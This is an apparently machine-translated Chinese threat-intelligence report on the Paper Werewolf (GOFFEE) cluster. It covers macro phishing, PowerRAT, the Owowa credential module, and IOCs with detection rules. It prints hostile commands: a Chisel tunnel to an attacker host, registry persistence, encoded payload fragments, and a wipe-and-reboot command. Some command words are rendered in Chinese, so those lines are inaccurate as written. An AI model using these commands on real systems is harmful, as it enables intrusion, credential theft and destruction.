BI.ZONE 威胁情报团队记录到 Paper Werewolf 攻击集群（又名 GOFFEE）活动激增，自 2022 年以来，该攻击集群已进行了至少七次攻击活动，受害者包括政府、能源、金融、媒体等组织。

攻击者会发送带有恶意宏的 Microsoft Word 附件的网络钓鱼电子邮件。然而，他们最近的活动已超出间谍目的：我们发现 Paper Werewolf 破坏了受感染基础设施的运行。

攻击者倾向于以知名组织的名义分发钓鱼邮件：大型机构、监管机构、执法机构。使用知名公司的名称会让受害者信任发件人并打开电子邮件。需要注意的是，组织不对犯罪分子的行为及其造成的损害负责。

主要发现

• 虽然此类网络间谍活动是主要目的，但一旦主要目标实现，它们就会出于怨恨而破坏目标基础设施的运行。
• 除了尝试后利用框架之外，对手还为此类框架开发了自己的植入物，这大大阻碍了检测。
• 攻击者选择 PowerShell 解释器作为一种多功能工具，使他们能够绕过公司防御。

活动

Paper Werewolf 使用包含恶意宏的 Microsoft Word 文档。此类文件很可能通过网络钓鱼电子邮件进行分发。

值得注意的是，攻击者经常使用Gophish开源框架来组织邮件，该框架旨在测试企业对网络钓鱼的脆弱性。

攻击者发送的网络钓鱼电子邮件示例

指向 Gophish 使用的链接

分发的文件被伪装成来自各个组织（研究机构、市政管理部门、电网公司等）的文件。

由于恶意文件已加密，因此会提示受害者允许宏。

恶意文档的加密内容

一旦受害者允许宏，文档内容就会被解密。

恶意文档的解密内容

通过用相应的俄文字母替换特殊字符来解密文档。

文档解密

在文档中搜索有效载荷始于DigitalRSASignature密钥字符串之后。有效载荷采用 Base64 加密，由两部分组成，由一个CHECKSUM字符串分隔。

加密有效载荷

该宏解密有效载荷并将其写入两个文件：

• %USERPROFILE%\UserCache.ini（PowerShell 脚本）
• %USERPROFILE%\UserCache.ini.hta（HTA）

为了在受感染的系统中保持持久性，将路径UserCache.ini.hta写入以下注册表参数：

HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ Windows \ LOAD

为了隐藏受感染系统中的恶意程序，威胁行为者使用环境变量：

• AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted]
• ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted]
• VB=VBScript
• AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))

其中一个案例中，恶意文档包含一个 1×1 像素图像的链接。利用这一技巧，攻击者可以监视受害者是否打开了恶意文档。

HTA 文件创建并运行一个文件%USERPROFILE%\UserCacheHelper.lnk.js来执行 PowerShell 脚本%USERPROFILE%\UserCache.ini。

的加密内容UserCache.ini是一个反向 shell，即一个名为PowerRAT 的PowerShell 脚本，它：

• Hidden为UserCache.ini和UserCache.ini.hta文件安装属性
• 调用服务器hxxp://[redacted]:80/api/texts/<victim_id>执行命令，其中victim_id代表[computer name]_[username]_[serial number of the system disk]。
  这些是具有以下属性的 XML 命令：
  - CountRuns，命令运行计数器
  - Interval，命令间隔（分钟）
  - Module，Base64 编码的命令（PowerShell 脚本）
• 运行从服务器收到的命令，该命令通过以下方式启动Invoke-Expression

在其他攻击中，攻击者使用模仿自己的加载程序explorer.exe。恶意程序加载并打开诱饵文档。诱饵被写入%TEMP%目录中。然后，加载程序向服务器发送 HTTP POST 请求以进入下一阶段。截至本文撰写之日，下一阶段尚无研究，但我们假设它涉及攻击者开发的 Mythic 框架代理，称为PowerTaskel和QwakMyAgent。加载程序中的函数名称使用Fowler–Noll–Vo算法进行哈希处理。

奇怪的是，攻击者将此植入物与另一个框架代理Freyja一起使用。

威胁行为者的武器库中还有一个恶意的 IIS 模块Owowa，该模块使他们能够在 Outlook Web Access (OWA) 服务中进行用户授权期间检索凭据。检索到的数据存储在 RAM 中的HashSet中。

Owowa 截获的数据示例

Owowa 模块之一将返回一个 Base-64 加密的数据集，其中请求标头包含用户名ZaDS0tojX0VDh82，并将删除解密数据集的内容并返回一个Ok字符串（RSA 加密），其中请求标头包含用户名oACgTsBMliysfk。

为了创建对受感染 IT 基础设施的冗余访问通道，攻击者采用了Chisel：

mastc.exe 客户端 --tls-skip-verify -v https: //[redacted]:49611 R:socks

他们可能使用PsExec在远程系统中运行命令。特别是执行破坏性操作：

cmd.exe /c '关闭/r /f /t 5 && 注册删除 HKEY_LOCAL_MACHINE\SYSTEM /f && 注册删除 HKEY_LOCAL_MACHINE\SOFTWARE /f'

为了阻碍员工与受感染的 IT 基础设施的交互，犯罪分子会更改账户密码：

net user [redacted] [redacted] /domain

在上述情况下，攻击者使用 PowerShell 脚本来运行命令。

妥协指标

• fa8853aaa156485855b77a16a2f613d9f58d82ef63505be8b19563827089bf52
• 13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b
• 8ba4cd7ea29f990cb86291003f82239bfafe28910d080b5b7d3db78e83c1b6f3
• 37b3fa8a3a05e4aedb25eb38d9e4524722f28c21fac9f788f87113c5b9184ef5
• 804cd68f40d0bb93b6676447af719388e95cafd5a2b017a0386eb7de590ebf17
• disk-yanbex[.]ru
• lobbyluxuries[.]com
• 94.103.85[.]47
• 185.244.182[.]87
• 5.252.176[.]55
• 85.198.110[.]216

检测

以下BI.ZONE EDR规则可以帮助组织检测所描述的恶意活动：

• win_enable_macros_in_ms_office_document
• win_spawning_untipical_process_by_ms_office_app
• win_hta_file_was_created_by_ms_office_app
• win_unusual_mshta_parent_process
• win_persistence_via_load_regkey_was_detected
• win_set_hidden_file_attribute_for_executable_or_script
• win_suspicious_powershell_execution_code_from_file
• gen_chisel_usage_detected
• win_using_psexec_to_execute_process_on_remote_host